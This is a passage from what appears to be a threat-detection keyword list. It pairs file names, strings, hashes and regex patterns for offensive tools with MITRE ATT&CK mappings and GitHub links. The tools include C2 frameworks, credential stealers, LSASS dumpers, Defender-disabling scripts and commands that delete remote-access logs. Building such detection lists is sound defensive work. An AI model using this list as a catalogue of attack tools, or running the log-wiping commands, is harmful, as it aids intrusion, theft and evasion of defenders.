Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decryptteamviewer*",".{0,1000}decryptteamviewer.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e*",".{0,1000}ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*DEED6795-9EC9-4B2C-95E0-9E465DA61755*",".{0,1000}DEED6795\-9EC9\-4B2C\-95E0\-9E465DA61755.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - 
T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*DeEpinGh0st/Erebus*",".{0,1000}DeEpinGh0st\/Erebus.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" 
"*deepinstinct/ContainYourself*",".{0,1000}deepinstinct\/ContainYourself.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*deepinstinct/Lsass-Shtinkering*",".{0,1000}deepinstinct\/Lsass\-Shtinkering.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*deepinstinct/LsassSilentProcessExit*",".{0,1000}deepinstinct\/LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*deepinstinct/NoFilter*",".{0,1000}deepinstinct\/NoFilter.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*deepsound2john.py*",".{0,1000}deepsound2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*deepzec*",".{0,1000}deepzec.{0,1000}","offensive_tool_keyword","Github Username","Github Author of malicious scripts and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*def nemesis_post_data(*",".{0,1000}def\snemesis_post_data\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be*",".{0,1000}def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*defanger exclusion*",".{0,1000}defanger\sexclusion.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger realtime*",".{0,1000}defanger\srealtime.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger signature*",".{0,1000}defanger\ssignature.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*default_userpass_for_services_unhash*",".{0,1000}default_userpass_for_services_unhash.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*default_users_for_services_unhash.txt*",".{0,1000}default_users_for_services_unhash\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DefaultBeaconApi*",".{0,1000}DefaultBeaconApi.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*DefaultCreds-cheat-sheet*",".{0,1000}DefaultCreds\-cheat\-sheet.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - 
T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*--defaults-torrc*",".{0,1000}\-\-defaults\-torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Defeat-Defender.bat*",".{0,1000}Defeat\-Defender\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*defeat-defender.py*",".{0,1000}defeat\-defender\.py.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Defeat-Defender-V1.3.ahk*",".{0,1000}Defeat\-Defender\-V1\.3\.ahk.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*DefenderCheck*",".{0,1000}DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier. Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","2133","364","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z" "*DefenderCheck.exe*",".{0,1000}DefenderCheck\.exe.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*",".{0,1000}DefenseEvasion_CodeSigning_PeSigningAuthHijack\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z"
"*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*",".{0,1000}DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*",".{0,1000}DefenseEvasion_ProcessInjection_CobaltStrikeOnline\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ExampleModule.py*",".{0,1000}DefenseEvasion_ProcessInjection_ExampleModule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_PeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 
- T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PowershellRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ProcessHandle.py*",".{0,1000}DefenseEvasion_ProcessInjection_ProcessHandle\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PythonRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PythonRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - 
T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_SessionClone.py*",".{0,1000}DefenseEvasion_ProcessInjection_SessionClone\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_ShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_WindowsSystem.py*",".{0,1000}DefenseEvasion_ProcessInjection_WindowsSystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies 
commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*",".{0,1000}DefenseEvasion_SubvertTrustControls_CloneSSLPem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*define DHCP_KEY _T(""SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\ServicePrivateData""*",".{0,1000}define\sDHCP_KEY\s_T\(\""SYSTEM\\\\CurrentControlSet\\\\Services\\\\DHCPServer\\\\ServicePrivateData\"".{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*DeimosC2*",".{0,1000}DeimosC2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 
"*dekrypted/Fentanyl*",".{0,1000}dekrypted\/Fentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}del\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}del\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. 
